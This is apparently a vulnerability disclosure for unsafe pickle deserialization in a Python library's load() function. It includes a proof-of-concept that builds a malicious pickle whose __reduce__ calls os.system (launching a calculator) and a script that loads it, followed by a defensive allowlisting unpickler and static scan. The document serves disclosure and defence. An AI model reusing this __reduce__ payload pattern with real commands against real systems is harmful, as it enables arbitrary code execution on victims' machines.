### Critical Vulnerability Information

#### Vulnerability Description

- **Issue**: The `load()` function in `pypickle.py` uses Python's `pickle.load()` to deserialize data from files, without validating or sanitizing the input.
- **Risk**: If an attacker provides a malicious pickle file, loading it can lead to arbitrary code execution, resulting in a Remote Code Execution (RCE) vulnerability.

#### Impact

- **Arbitrary Code Execution**
- **Remote System Compromise**

#### Affected Components

- **File**: `pypickle.py`
- **Function**: `load()`
- **Issue**: `pickle.load()` used without input validation

#### Reproduction Steps

1. Clone the repository: `git clone https://github.com/erdogant/pypickle.git`
2. Navigate to the `pypickle` directory: `cd pypickle`
3. Create a malicious `malicious.pkl` file:

   ```python
   import pickle
   import os

   class Exploit:
       def __reduce__(self):
           return (os.system, ("gnome-calculator",))  # Change to 'calc.exe' on Windows

   with open("malicious.pkl", "wb") as f:
       pickle.dump(Exploit(), f)
   ```

4. Create a `run_exploit.py` file:

   ```python
   import pypickle

   pypickle.load("malicious.pkl")
   ```

5. Run `run_exploit.py`: `python3 run_exploit.py`

#### Solution

- Add a `validate` parameter, defaulting to `True`, to check for high-risk modules and block loading.
- Upgrade to version `2.0.0` using `pip install -U pypickle`.
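One way to implement the `validate` check described in the Solution (an added example, not pypickle's own code): a static scan of the pickle's global references with `pickletools`, backed by an allowlisting `find_class` override so that a reference the scan misses is still refused at load time. The allowlist, function names and the two sample pickles are this example's own constructions.

```python
import io
import pickle
import pickletools

# Example policy (not pypickle's own): only plain builtin containers and scalars
# may be resolved by name; any other module.name reference counts as high-risk.
SAFE_GLOBALS = {("builtins", n) for n in (
    "dict", "list", "set", "frozenset", "tuple", "str", "bytes",
    "int", "float", "bool", "complex", "range", "slice")}

def referenced_globals(data):
    """Statically list every module.name the pickle would import, without loading it."""
    found, strings = [], []
    for op, arg, _ in pickletools.genops(data):
        if op.name == "GLOBAL":                       # protocols 0-3: arg is "module name"
            found.append(tuple(arg.split(" ", 1)))
        elif op.name == "STACK_GLOBAL":               # protocol 4+: pops the two preceding strings
            found.append((strings[-2], strings[-1]))
        elif op.name in ("SHORT_BINUNICODE", "BINUNICODE", "BINUNICODE8", "UNICODE"):
            strings.append(arg)
    return found

def high_risk_globals(data):
    """Referenced globals that fall outside the allowlist."""
    return [g for g in referenced_globals(data) if g not in SAFE_GLOBALS]

class RestrictedUnpickler(pickle.Unpickler):
    """Second layer: find_class consults the allowlist instead of importing freely."""
    def find_class(self, module, name):
        if (module, name) in SAFE_GLOBALS:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"blocked global reference {module}.{name}")

def restricted_loads(data):
    return RestrictedUnpickler(io.BytesIO(data)).load()

def safe_loads(data):
    """Static scan first, then the restricted unpickler in case the scan missed a reference."""
    bad = high_risk_globals(data)
    if bad:
        raise pickle.UnpicklingError(f"refusing to load; high-risk globals: {bad}")
    return restricted_loads(data)

# Constructed samples: a benign dict, and a hand-assembled protocol-0 pickle that only
# references os.system (GLOBAL then STOP, nothing is called) to exercise the check.
BENIGN = pickle.dumps({"rows": [1, 2, 3], "name": "report"}, protocol=4)
SUSPICIOUS = b"cos\nsystem\n."
```

Matching on the full `(module, name)` pair against an allowlist matters: `pickle.dumps` records a builtin such as `os.system` under its C module's name (`posix` or `nt`), so a denylist keyed on the module name `os` alone would not see it.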